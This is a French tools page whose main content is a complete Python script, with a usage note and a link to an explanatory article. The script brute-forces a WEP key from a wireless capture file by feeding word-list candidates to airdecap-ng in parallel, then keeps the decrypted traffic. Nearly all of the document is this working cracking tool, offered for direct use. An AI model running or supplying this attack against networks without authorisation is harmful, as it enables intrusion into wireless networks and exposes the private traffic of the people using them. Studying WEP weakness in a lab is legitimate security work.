Outils
Cracker un mot de passe WEP à partir d'une capture contenant peu d'IV.
https://gist.github.com/tbhaxor/170894df0d43fd23eae49b0b20442c27
Script
Python 3
import re
import sys
import subprocess
import os
import uuid
from binascii import hexlify
from concurrent.futures import ThreadPoolExecutor
# Three positional arguments are mandatory: word list, capture file and BSSID.
# Without them, show the usage line on stderr and stop with a non-zero status.
if len(sys.argv) < 4:
    usage_line = "usage: %s <password file> <capture file> <bssid>" % sys.argv[0]
    print(usage_line, file=sys.stderr)
    sys.exit(1)
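def do_crack(ascii: bytes, key: bytes, pool: ThreadPoolExecutor):
    """Try one candidate WEP key against the capture file using airdecap-ng.

    Args:
        ascii: Candidate key exactly as read from the word list.
        key: The same key hex-encoded; passed to ``airdecap-ng -w``.
        pool: Executor this task runs in; shut down once a key decrypts packets.

    The capture file and BSSID are read from ``sys.argv[2]`` and
    ``sys.argv[3]``. airdecap-ng is started by absolute path with an argument
    list (no shell), so those values are never interpreted by a shell.

    This function runs in a worker thread: ``sys.exit(0)`` only raises
    ``SystemExit`` in that thread, and the script stops because the pool has
    been shut down first. Any other exception raised here (for example
    ``subprocess.CalledProcessError``) ends up on the task's Future; it is
    reported only if the caller inspects that Future.
    """
    shown = ascii.decode()
    sys.stdout.write("\033[K")
    print("[!] Trying key", shown, end="\r")

    # Per-attempt output name. uuid4 instead of uuid1: uuid1 can embed the
    # host's MAC address and a timestamp in the file name.
    outfile = uuid.uuid4().hex + ".cap"

    decrypted = False
    try:
        # key, bssid, output file and capture file, in that order
        output = subprocess.check_output(
            [
                "/usr/bin/airdecap-ng",
                "-w", key,
                "-b", sys.argv[3],
                "-o", outfile,
                sys.argv[2],
            ],
            stderr=subprocess.DEVNULL,
        )

        # The key is accepted when the line containing "decrypted WEP" ends
        # with a non-zero count.
        for entry in output.decode(errors="replace").splitlines():
            if "decrypted WEP" in entry and int(entry.split()[-1]) != 0:
                decrypted = True
                break
    finally:
        # Remove the output file on every unsuccessful path (zero count, no
        # matching line, airdecap-ng failure) so rejected attempts leave no
        # stray capture files behind. The file may not exist at all.
        if not decrypted:
            try:
                os.unlink(outfile)
            except FileNotFoundError:
                pass

    if decrypted:
        sys.stdout.write("\033[K")
        print("\r[!] Found: ", shown)
        # NOTE: the kept file holds decrypted traffic; it is written to the
        # current working directory.
        print("[!] Decrypted file: ", outfile)
        # Cancel queued attempts; the next submit() on this pool will fail.
        pool.shutdown(wait=False, cancel_futures=True)
        sys.exit(0)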
# Driver: feed every usable line of the word list to the worker pool.
# RuntimeError is the expected signal that the pool was shut down while lines
# were still being submitted; any other exception is reported as a failure.
try:
    # At most 5 attempts run concurrently. The word list (first argument) is
    # read as bytes.
    with ThreadPoolExecutor(max_workers=5) as pool, open(sys.argv[1], "rb") as file:
        for raw in file:
            # drop surrounding whitespace such as \r and \n
            candidate = raw.strip()
            # only 5-byte (40-bit) and 13-byte (104-bit) entries are keys
            if len(candidate) not in (5, 13):
                continue
            # hex-encode the entry, like "echo key | xxd -ps"
            pool.submit(do_crack, candidate, hexlify(candidate), pool)
except RuntimeError:
    sys.exit(0)
except Exception as e:
    print("Unexpected failure: %s" % e)
    sys.exit(1)
Exemple d'usage
En pratique :
Note
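Attention à bien choisir sa liste de mots de passe : le script ne teste que les lignes de 5 ou 13 octets (clés WEP de 40 ou 104 bits) et ignore les autres.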
Présentation et explication d'une attaque
https://tbhaxor.com/decrypt-wep-traffic-with-insufficient-ivs/